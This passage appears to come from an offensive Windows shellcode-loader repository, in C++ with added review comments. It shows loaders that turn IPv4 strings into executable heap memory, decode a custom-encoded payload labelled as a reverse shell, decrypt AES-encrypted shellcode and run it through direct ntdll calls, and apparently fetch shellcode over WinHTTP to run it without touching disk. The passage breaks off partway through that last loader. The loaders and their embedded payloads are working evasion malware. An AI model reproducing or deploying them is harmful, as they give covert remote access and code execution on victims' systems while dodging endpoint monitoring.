126 | "71.19.114.111",
127 | "106.0.89.65",
128 | "137.218.255.213",
129 | };
130 |
131 |
// LpBaseAddress and LpBaseAddress2 are not used again in this function; the outer STATUS is
// shadowed by the loop-local declaration below.
132 | PCSTR Terminator = NULL;
133 | PVOID LpBaseAddress = NULL;
134 | PVOID LpBaseAddress2 = NULL;
135 | NTSTATUS STATUS;
136 |
// Every block from this heap is executable.
137 | HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
138 | if (!hHeap) {
139 | printf("Failed to create a heap (%u)\n", GetLastError());
140 | return -1;
141 | }
// 0x1000 bytes are requested regardless of the table size; the loop writes init * 4 bytes.
142 | void* alloc_mem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
143 | if (!alloc_mem) {
144 | printf("Failed to allocate memory on the heap (%u)\n", GetLastError());
145 | return -2;
146 | }
147 | DWORD_PTR ptr = (DWORD_PTR)alloc_mem;
148 | int init = sizeof(IPv4s) / sizeof(IPv4s[0]);
149 |
// Each string is parsed straight into the heap block; ptr advances by the 4 bytes written.
150 | for (int i = 0; i < init; i++) {
151 | RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)ptr);
152 | if (!NT_SUCCESS(STATUS)) {
// NOTE(review): the message names RtlIpv6StringToAddressA although the call above is the IPv4
// routine, and FALSE is 0, so a parse failure exits with the same code as success.
153 | printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)", IPv4s[i], STATUS, GetLastError());
154 | return FALSE;
155 | }
156 | ptr += 4;
157 | }
158 |
// The thread start address is the heap block itself.
159 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
160 | if (!tHandle) {
161 | printf("Failed to Create the thread (%u)\n", GetLastError());
162 | return -3;
163 | }
164 |
165 | WaitForSingleObject(tHandle, INFINITE);
166 |
167 |
168 | return 0;
169 | }
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // calc
5 | //unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4a, 0xbb, 0x3, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x4a, 0x8e, 0x8f, 0x2, 0x3, 0x1, 0x2, 0x42, 0xbc, 0x32, 0x8d, 0x70, 0x89, 0x100, 0xd7, 0xbc, 0xf2, 0xb6, 0xa4, 0x57, 0x43, 0xbb, 0xa8, 0x96, 0xbf, 0x9e, 0x101, 0xd6, 0x4a, 0x84, 0xc6, 0x29, 0x3e, 0x7, 0x7e, 0xb, 0x82, 0xfc, 0xe2, 0x76, 0x7, 0xbc, 0x49, 0x14, 0x74, 0x70, 0x6c, 0x1, 0x5b, 0x42, 0x8b, 0xdb, 0x101, 0xd6, 0x65, 0x62, 0x6e, 0x64, 0x30, 0x66, 0x7a, 0x66, 0x2 };
6 | // reverse shell
7 | unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4b, 0xbf, 0x79, 0x74, 0x34, 0x60, 0x35, 0x33, 0x2, 0x1, 0x43, 0x57, 0x4b, 0x8a, 0xe8, 0x49, 0x83, 0xed, 0xa2, 0x2, 0x2, 0x1, 0x4b, 0x8a, 0xe7, 0x4a, 0xbe, 0x3, 0x2, 0x5, 0xd4, 0x65, 0x5d, 0xb1, 0xf, 0x42, 0x56, 0x4a, 0x8b, 0xe5, 0x4e, 0x8a, 0xf3, 0x42, 0xbc, 0x4d, 0x79, 0x27, 0x9, 0x100, 0xd7, 0x4d, 0x8b, 0xeb, 0x6a, 0x2, 0x3, 0x1, 0x2, 0x5a, 0x43, 0xbb, 0x2b, 0x81, 0x6d, 0x1, 0x101, 0xd6, 0x52, 0x51, 0x4f, 0x32, 0xcb, 0x4e, 0x33, 0xc1, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc3, 0x4a, 0x100, 0xc2, 0x49, 0x8b, 0xc2, 0x43, 0xbb, 0xec, 0x10, 0xe1, 0xe1, 0x101, 0xd6, 0x4a, 0x8a, 0xc9, 0x6b, 0x12, 0x42, 0x5a, 0x4d, 0x8b, 0xe3, 0x4a, 0x8a, 0xfb, 0x42, 0xbc, 0x9a, 0xa7, 0x75, 0x63, 0x100, 0xd7, 0x49, 0x83, 0xc5, 0x42, 0x3, 0x2, 0x1, 0x4b, 0xb9, 0x65, 0x6e, 0x66, 0x1, 
0x2, 0x1, 0x2, 0x1, 0x43, 0x51, 0x43, 0x51, 0x4a, 0x8a, 0xe4, 0x58, 0x59, 0x58, 0x4f, 0x32, 0xc2, 0x6b, 0xf, 0x5a, 0x43, 0x51, 0xe4, 0xfd, 0x68, 0xc8, 0x46, 0x25, 0x56, 0x2, 0x3, 0x49, 0x8f, 0x45, 0x26, 0x19, 0xc8, 0x1, 0x6a, 0x49, 0x8b, 0xe7, 0x58, 0x51, 0x43, 0x51, 0x43, 0x51, 0x43, 0x51, 0x4b, 0x100, 0xc2, 0x42, 0x52, 0x4a, 0x101, 0xc9, 0x4f, 0x8a, 0xc3, 0x4d, 0x8b, 0xc2, 0x43, 0xbb, 0x7b, 0xcd, 0x41, 0x87, 0x101, 0xd6, 0x4a, 0x32, 0xd4, 0x49, 0x101, 0xcb, 0x8d, 0xf, 0x43, 0xbb, 0xa, 0x88, 0x1f, 0x61, 0x101, 0xd6, 0xbd, 0xe1, 0x1f, 0x2b, 0xc, 0x42, 0xbc, 0xa7, 0x97, 0xbe, 0x9f, 0x100, 0xd7, 0x49, 0x85, 0xc5, 0x2a, 0x3d, 0x8, 0x7d, 0xc, 0x81, 0xfd, 0xe1, 0x77, 0x6, 0xbd, 0x48, 0x15, 0x73, 0x71, 0x6b, 0x2, 0x5a, 0x43, 0x8a, 0xdc, 0x100, 0xd7 };
8 | DWORD payloadLen = sizeof(payload);
9 |
// Reverses the sample's byte encoding in place: subtracts 1 from every even-index byte and
// 2 from every odd-index byte, over payloadLen bytes (the file-scope length, not a parameter).
// The parameter shadows the file-scope payload array; main passes that same array.
// Arithmetic is on unsigned char, so it wraps modulo 256 (0x00 - 1 becomes 0xff).
// NOTE(review): the initialiser of the file-scope array contains 0x100 and 0x101, which do not
// fit in an unsigned char; presumably the encoder did not wrap. Confirm how the compiler
// treats them before relying on a static decode of the table.
10 | void Decode(unsigned char* payload) {
11 | for (int i = 0; i < payloadLen; i++) {
12 | if (i % 2 == 0) {
13 | payload[i]--;
14 | }
15 | else {
16 | payload[i] -= 2;
17 | }
18 | }
19 | }
20 |
// Sample loader for the custom byte encoding: decodes the file-scope payload array in place
// with Decode, copies it into a PAGE_READWRITE allocation, changes the region to
// PAGE_EXECUTE_READ, and runs it on a new thread.
// Returns -1, -2 or -3 when allocation, the protection change or thread creation fails.
// Defensive notes: the encoding only changes the bytes stored in the file. After Decode runs,
// the decoded bytes exist twice in process memory (the array in the image's data and the new
// allocation), so memory scanning and the RW->RX / thread-start signals still apply.
21 | int main() {
22 |
23 | LPVOID alloc_mem = VirtualAlloc(NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
24 | if (!alloc_mem) {
25 | printf("Failed to Allocate memory (%u)\n", GetLastError());
26 | return -1;
27 | }
28 |
// Overwrites the file-scope array itself with the decoded bytes.
29 | Decode(payload);
30 |
31 | /*
32 | printf("\n[+] After Decode:\n");
33 | for (int i = 0; i < payloadLen; i++) {
34 | printf("%2x ,", payload[i]);
35 | }
36 | */
37 | CopyMemory(alloc_mem, payload, payloadLen);
38 |
39 | DWORD OldProtect;
// Read-write to read-execute: the region is never writable and executable at the same time.
40 | if (!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {
41 | printf("Failed to Change memory protection (%u)\n", GetLastError());
42 | return -2;
43 | }
44 |
// The thread start address is the allocation itself.
45 | HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
46 | if (!tHandle) {
47 | printf("Failed to create the Thread (%u)\n", GetLastError());
48 | return -3;
49 | }
50 | WaitForSingleObject(tHandle, INFINITE);
51 |
52 | return 0;
53 | }
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment (lib, "crypt32.lib")
5 |
6 | #pragma comment(lib, "ntdll")
7 |
8 | #define NtCurrentProcess() ((HANDLE)-1)
9 | #define DEFAULT_BUFLEN 4096
10 |
11 | #ifndef NT_SUCCESS
12 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
13 | #endif
14 |
// Hand-written prototypes for four ntdll exports. The file links against ntdll (see the
// #pragma comment(lib, "ntdll") line above) and main calls these rather than the documented
// kernel32 wrappers (VirtualAlloc, VirtualProtect, CreateThread, WaitForSingleObject).
// Defensive note: monitoring placed only on the kernel32/KernelBase wrappers does not observe
// these calls; ntdll-level or kernel-level telemetry does.
15 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
16 | HANDLE ProcessHandle,
17 | PVOID* BaseAddress,
18 | ULONG_PTR ZeroBits,
19 | PSIZE_T RegionSize,
20 | ULONG AllocationType,
21 | ULONG Protect
22 | );
23 |
24 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
25 | IN HANDLE ProcessHandle,
26 | IN OUT PVOID* BaseAddress,
27 | IN OUT PSIZE_T RegionSize,
28 | IN ULONG NewProtect,
29 | OUT PULONG OldProtect);
30 |
31 | EXTERN_C NTSTATUS NtCreateThreadEx(
32 | OUT PHANDLE hThread,
33 | IN ACCESS_MASK DesiredAccess,
34 | IN PVOID ObjectAttributes,
35 | IN HANDLE ProcessHandle,
36 | IN PVOID lpStartAddress,
37 | IN PVOID lpParameter,
38 | IN ULONG Flags,
39 | IN SIZE_T StackZeroBits,
40 | IN SIZE_T SizeOfStackCommit,
41 | IN SIZE_T SizeOfStackReserve,
42 | OUT PVOID lpBytesBuffer
43 | );
44 |
45 | EXTERN_C NTSTATUS NtWaitForSingleObject(
46 | IN HANDLE Handle,
47 | IN BOOLEAN Alertable,
48 | IN PLARGE_INTEGER Timeout
49 | );
50 |
51 |
52 |
// Decrypts shellcode in place with AES-256 through the legacy CryptoAPI.
// The AES key is not `key` itself: key is hashed with SHA-256 and CryptDeriveKey turns that
// hash into the CALG_AES_256 key. No mode or IV is set here, so the provider defaults apply,
// and CryptDecrypt is called with Final = 0.
// Parameters: shellcode / shellcodeLen - buffer and byte count, overwritten with the result;
//             key / keyLen - the bytes fed to the hash.
// Returns nothing: failures are only printed, and shellcodeLen is passed by value, so the
// caller learns neither whether decryption succeeded nor the resulting length.
// NOTE(review): each early return leaves the handles acquired so far open.
// Analysis note: the key bytes and the ciphertext are both embedded in the same binary (see
// main), so the plaintext can be recovered statically by repeating these steps.
53 | void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
54 | HCRYPTPROV hProv;
55 | HCRYPTHASH hHash;
56 | HCRYPTKEY hKey;
57 |
58 | if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
59 | printf("Failed in CryptAcquireContextW (%u)\n", GetLastError());
60 | return;
61 | }
62 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
63 | printf("Failed in CryptCreateHash (%u)\n", GetLastError());
64 | return;
65 | }
66 | if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
67 | printf("Failed in CryptHashData (%u)\n", GetLastError());
68 | return;
69 | }
70 | if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
71 | printf("Failed in CryptDeriveKey (%u)\n", GetLastError());
72 | return;
73 | }
74 |
// In-place decryption; the updated length written to the local shellcodeLen is discarded.
75 | if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen)) {
76 | printf("Failed in CryptDecrypt (%u)\n", GetLastError());
77 | return;
78 | }
79 |
// NOTE(review): the provider context is released before the hash and key created from it.
80 | CryptReleaseContext(hProv, 0);
81 | CryptDestroyHash(hHash);
82 | CryptDestroyKey(hKey);
83 |
84 | }
85 |
86 |
// Sample loader for the AES variant: decrypts the embedded AESshellcode array in place with
// DecryptAES, copies it into a 0x2000-byte PAGE_READWRITE region obtained through
// NtAllocateVirtualMemory, changes the region to PAGE_EXECUTE_READ, starts a thread at its base
// with NtCreateThreadEx, and waits up to one second for that thread.
// Returns 1-4 for a failed allocation, protection change, thread creation or wait; argc and
// argv are not used.
// Defensive notes: the 16-byte key and the ciphertext are stored side by side in the binary,
// so static recovery is possible (see DecryptAES); at run time the decrypted bytes exist both
// in the image's data and in the new region, and the RW->RX change plus a thread start
// address outside any loaded image remain observable at the ntdll or kernel level.
87 | int main(int argc, char** argv) {
88 |
89 | char AESkey[] = { 0x64, 0xb5, 0x31, 0xfe, 0xb3, 0x6b, 0xb3, 0x8c, 0x88, 0x6a, 0x4c, 0x38, 0xc, 0xcb, 0x19, 0x4a };
90 | unsigned char AESshellcode[] = { 0x8, 0x21, 0x22, 0xeb, 0xfa, 0xdb, 0x42, 0x9, 0x8e, 0x24, 0xb6, 0x10, 0xfb, 0x93, 0x5b, 0xfe, 0xc3, 0x9d, 0x75, 0x68, 0xcc, 0x35, 0xd0, 0xef, 0xfd, 0x23, 0x70, 0xe3, 0x1, 0x3d, 0x8f, 0xd0, 0xe6, 0x5b, 0x97, 0x5e, 0x79, 0x78, 0x55, 0xf9, 0xaf, 0x71, 0x67, 0x78, 0x3c, 0xd9, 0x4a, 0xe7, 0x81, 0xc, 0xe5, 0x50, 0x46, 0x47, 0xa, 0x2e, 0x79, 0x5b, 0x6f, 0x43, 0x4d, 0x10, 0x2d, 0x35, 0x93, 0x94, 0xdd, 0x8f, 0x36, 0x2d, 0x3, 0xed, 0x9, 0x33, 0xed, 0xe3, 0xe1, 0x43, 0x17, 0xb6, 0xff, 0xe9, 0x69, 0x33, 0x1c, 0x81, 0x83, 0xb, 0xbf, 0x13, 0x1c, 0x25, 0xd5, 0x2f, 0xb8, 0x90, 0x6d, 0x1e, 0xd3, 0x11, 0xd, 0x29, 0xf7, 0x13, 0xde, 0x7e, 0x71, 0x53, 0x7, 0x44, 0xf3, 0xf6, 0xf6, 0xc3, 0x54, 0xb3, 0xaa, 0xe1, 0xd6, 0xbf, 0x1e, 0xa, 0x9c, 0x25, 0x72, 0x9e, 0x8b, 0x54, 0x62, 0x1c, 0xd9, 0x72, 0xab, 0xbd, 0x30, 0x47, 0x65, 0xd2, 0x0, 0x45, 0xb, 0xc4, 0x16, 0xbb, 0x80, 0xf, 0xd4, 0x0, 0x22, 0x40, 0xd3, 0x4d, 0xbb, 0x3f, 0x64, 0xe1, 0xa8, 0x2a, 0x60, 0x1e, 0xd1, 0x0, 0xd9, 0xb3, 0x46, 0xb6, 0x1c, 0xd0, 0xe2, 0xe1, 0x7d, 0x99, 0x9f, 0x8a, 0x70, 0xd5, 0x7d, 0x9c, 0x88, 0xd, 0x2d, 0xbb, 0x4c, 0x2a, 0x3f, 0xeb, 0xfd, 0xdd, 0xad, 0x8f, 0xba, 0xcc, 0x87, 0x3, 0xcf, 0x8f, 0x15, 0x54, 0xc5, 0xc1, 0xa2, 0xcb, 0x9b, 0x14, 0xae, 0xcb, 0x8, 0xf, 0x5a, 0xae, 0x6d, 0x63, 0xf3, 0x82, 0xe2, 0xec, 0x79, 0xe0, 0x1c, 0xb1, 0x85, 0xa9, 0x22, 0xb0, 0x66, 0xe9, 0x73, 0xbe, 0xdc, 0xac, 0xdc, 0x7d, 0x2e, 0xac, 0x5d, 0x29, 0x23, 0x44, 0x11, 0xee, 0xbf, 0xc9, 0x60, 0xa2, 0x1e, 0x7, 0x6d, 0x9e, 0x56, 0xf2, 0xb4, 0x2a, 0xb6, 0x83, 0x4, 0xca, 0x7e, 0xcb, 0x7e, 0x63, 0x8a, 0x70, 0xa1, 0xe5, 0x1f, 0x6f, 0xa, 0x21, 0x2e, 0x5b, 0x4c, 0x6a, 0x62, 0x84, 0x70, 0x33, 0x84, 0xca, 0x48, 0x39, 0x6b, 0x64, 0xc6, 0x4, 0xc6, 0x6f, 0xe2, 0x6d, 0x29, 0xda, 0x78, 0x64, 0x59, 0x13, 0xfe, 0x2, 0x3, 0xd9, 0xe, 0x7e, 0x97, 0x10, 0x7c, 0xbd, 0x9a, 0xf1, 0xbf, 0xce, 0x4e, 0x4, 0xf1, 0x93, 0x25, 0x88, 0x52, 0x99, 0x44, 0xbd, 0x52, 0x7c, 0xfe, 0x2c, 0xdb, 0x50, 0x9, 0x3b, 0x2a, 0xd, 0x30, 0x73, 0x3c, 0x8c, 
0xee, 0xec, 0xb8, 0xc8, 0xe3, 0x3d, 0x48, 0xed, 0xc0, 0x4b, 0xd1, 0x8d, 0x48, 0x0, 0x3, 0xd8, 0xc, 0xde, 0x69, 0xf9, 0xe, 0xda, 0x31, 0xfe, 0xb6, 0x77, 0xc4, 0x4d, 0x31, 0x25, 0xc5, 0xd1, 0xa1, 0x11, 0x22, 0x15, 0x8, 0xc7, 0xa5, 0x73, 0x19, 0x3a, 0x87, 0x5, 0xcc, 0x37, 0x34, 0xad, 0x8a, 0xfa, 0xae, 0x6b, 0xf8, 0x38, 0x4a, 0x5, 0x2e, 0x74, 0xda, 0x77, 0x2a, 0xa0, 0x4f, 0xab, 0xcd, 0xbb, 0x2e, 0x2f, 0xb8, 0xf7, 0xa1, 0x91, 0x8e, 0x42, 0x43, 0x85, 0xa, 0x6b, 0xfd, 0x6d, 0x37, 0xd8, 0xa, 0x53, 0x9f, 0x54, 0x49, 0x26, 0x2a, 0x6d, 0x9e, 0x85, 0x30, 0xe5, 0xc7, 0x91, 0x80, 0x75, 0x79, 0xc1, 0x2a, 0x87, 0xc9, 0xd0, 0x47, 0xdd, 0xc3, 0x9f, 0x66, 0xf0, 0x23, 0xf1, 0xa2, 0x4, 0x7e, 0xf1, 0xd7, 0x28, 0x1d, 0x3b, 0xcd, 0x2, 0x7, 0xc, 0x72, 0x37, 0x94, 0xa6, 0x1b, 0x5c, 0x6d, 0x41 };
91 |
92 | DWORD payload_length = sizeof(AESshellcode);
93 |
94 | PVOID BaseAddress = NULL;
95 | SIZE_T dwSize = 0x2000;
96 |
// The region size is the fixed 0x2000, not derived from the array size.
97 | NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
98 | if (!NT_SUCCESS(status1)) {
99 | return 1;
100 | }
101 |
102 | // Decrypt the AES payload to Original Shellcode
// DecryptAES returns void, so execution continues here even if decryption failed.
103 | DecryptAES((char*)AESshellcode, payload_length, AESkey, sizeof(AESkey));
104 |
105 |
106 | RtlMoveMemory(BaseAddress, AESshellcode, sizeof(AESshellcode));
107 |
// hThread is not used again in this function.
108 | HANDLE hThread;
109 | DWORD OldProtect = 0;
110 |
// Read-write to read-execute: the region is never writable and executable at the same time.
111 | NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);
112 | if (!NT_SUCCESS(NtProtectStatus1)) {
113 | return 2;
114 | }
115 |
116 |
117 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
118 |
// The thread start address is the region base.
119 | NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
120 | if (!NT_SUCCESS(NtCreateThreadstatus)) {
// NOTE(review): the failure is reported in the returned NTSTATUS, which is not printed;
// GetLastError is presumably not set by this call, so the number shown may be unrelated.
121 | printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
122 | return 3;
123 | }
124 |
// A negative QuadPart is a relative interval in 100-nanosecond units: one second.
125 | LARGE_INTEGER Timeout;
126 | Timeout.QuadPart = -10000000;
127 |
128 |
129 | NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);
130 | if (!NT_SUCCESS(NTWFSOstatus)) {
131 | printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
132 | return 4;
133 | }
134 |
135 | return 0;
136 | }
137 |
138 |
139 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | #pragma comment(lib, "ntdll")
8 | #pragma comment(lib, "winhttp")
9 |
10 | #pragma warning (disable: 4996)
11 | #define _CRT_SECURE_NO_WARNINGS
12 |
13 |
14 | #define NtCurrentProcess() ((HANDLE)-1)
15 | #define DEFAULT_BUFLEN 4096
16 |
17 | #ifndef NT_SUCCESS
18 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
19 | #endif
20 |
// Hand-written prototypes for four ntdll exports. The file links against ntdll (see the
// #pragma comment(lib, "ntdll") line above) and RunShellcode calls these rather than the
// documented kernel32 wrappers (VirtualAlloc, VirtualProtect, CreateThread, WaitForSingleObject).
// Defensive note: monitoring placed only on the kernel32/KernelBase wrappers does not observe
// these calls; ntdll-level or kernel-level telemetry does.
21 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
22 | HANDLE ProcessHandle,
23 | PVOID* BaseAddress,
24 | ULONG_PTR ZeroBits,
25 | PSIZE_T RegionSize,
26 | ULONG AllocationType,
27 | ULONG Protect
28 | );
29 |
30 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
31 | IN HANDLE ProcessHandle,
32 | IN OUT PVOID* BaseAddress,
33 | IN OUT PSIZE_T RegionSize,
34 | IN ULONG NewProtect,
35 | OUT PULONG OldProtect);
36 |
37 | EXTERN_C NTSTATUS NtCreateThreadEx(
38 | OUT PHANDLE hThread,
39 | IN ACCESS_MASK DesiredAccess,
40 | IN PVOID ObjectAttributes,
41 | IN HANDLE ProcessHandle,
42 | IN PVOID lpStartAddress,
43 | IN PVOID lpParameter,
44 | IN ULONG Flags,
45 | IN SIZE_T StackZeroBits,
46 | IN SIZE_T SizeOfStackCommit,
47 | IN SIZE_T SizeOfStackReserve,
48 | OUT PVOID lpBytesBuffer
49 | );
50 |
51 | EXTERN_C NTSTATUS NtWaitForSingleObject(
52 | IN HANDLE Handle,
53 | IN BOOLEAN Alertable,
54 | IN PLARGE_INTEGER Timeout
55 | );
56 |
57 |
// Copies shellcodeLen bytes from shellcode into a fresh 0x2000-byte PAGE_READWRITE region,
// changes the region to PAGE_EXECUTE_READ, prints its address, waits for a key press, then
// starts a thread at the region base and waits up to one second for it.
// Returns nothing; on any failure it simply returns (two of the paths print a message).
// Presumably called with the HTTP response body fetched by getShellcode_Run; the call site is
// outside this view.
// NOTE(review): shellcodeLen is never compared with the 0x2000-byte region before the copy.
// Defensive notes: this routine writes nothing to disk, so file scanning has nothing to
// inspect; the observable events are the HTTP request made by the caller, the RW->RX
// protection change on private memory, and a thread start address outside any loaded image.
58 | void RunShellcode(char* shellcode, DWORD shellcodeLen) {
59 | PVOID BaseAddress = NULL;
60 | SIZE_T dwSize2 = 0x2000;
61 |
// Terminator and STATUS are not used again in this function.
62 | PCSTR Terminator = NULL;
63 | NTSTATUS STATUS;
64 |
65 | NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
66 | if (!NT_SUCCESS(status1)) {
67 | return ;
68 | }
69 |
70 |
71 | RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);
72 |
73 |
74 |
// hThread is not used again in this function.
75 | HANDLE hThread;
76 | DWORD OldProtect = 0;
77 |
// Read-write to read-execute: the region is never writable and executable at the same time.
78 | NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, &dwSize2, PAGE_EXECUTE_READ, &OldProtect);
79 | if (!NT_SUCCESS(NtProtectStatus1)) {
80 | return;
81 | }
82 |
83 | printf("\n\nShellcode_mem : %p\n\n", BaseAddress);
84 |
// Blocks until a key is pressed; the region is already executable but nothing runs yet.
85 | getchar();
86 |
87 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
88 |
89 |
// The thread start address is the region base.
90 | NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
91 | if (!NT_SUCCESS(NtCreateThreadstatus)) {
// NOTE(review): the failure is reported in the returned NTSTATUS, which is not printed;
// GetLastError is presumably not set by this call, so the number shown may be unrelated.
92 | printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
93 | return;
94 | }
95 |
// A negative QuadPart is a relative interval in 100-nanosecond units: one second.
96 | LARGE_INTEGER Timeout;
97 | Timeout.QuadPart = -10000000;
98 |
99 |
100 | NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);
101 | if (!NT_SUCCESS(NTWFSOstatus)) {
